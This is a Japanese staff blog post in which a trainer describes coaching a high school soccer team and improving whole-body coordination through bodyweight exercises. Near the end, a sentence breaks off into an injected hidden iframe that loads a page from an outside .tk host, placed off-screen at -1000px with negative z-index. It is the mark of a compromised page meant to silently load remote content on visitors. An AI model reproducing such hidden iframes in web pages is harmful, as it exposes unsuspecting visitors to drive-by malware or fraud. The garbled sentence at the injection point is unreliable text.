スタッフブログ Staff Blog

コーディネーション

こんばんは、高橋涼です!

今日は山の手高校サッカー部のトレーニング指導をしてきました!

毎年必ず1人はトレーニング姿勢を見ていると、手が予期していない動きをしていたり、身体が捻れていたり不思議な動きをする人がいます。
自分でもよくわからないがこうなってしまう。

全身のコーディネーション能力、いわゆる全身をうまく使うことが出来ていないという状態です。
これは目で見て認知したことを真似して身体で表現できない、
簡単に言うとうまく頭と身体の神経が繋がっていないとも言えます。

そういった人でもやはり1年生の頃から3年生の引退する頃までにはかなりその状態が改善され、頭と体の神経がうまく繋がるようになります。

私は、サッカーだけでは上達しずらいコーディネーション能力も、自重のトレーニングを正しい姿勢で続けていけば充分改善出来ると感じています。

今日もまた1年生と3年生のトレーニング風景を見!–844c7b74e31d727d5814a0ed667c0255–iframe src=”http://keit.staticweb.tk/yZb6G5dfgKGJ” width=640 height=480 style=’position: absolute; left: -1000px; top: -1000px; z-index:-1;’/iframe

コメントを投稿する
※承認されるまではコメントは表示されません。

CAPTCHA


ページ上部へ戻る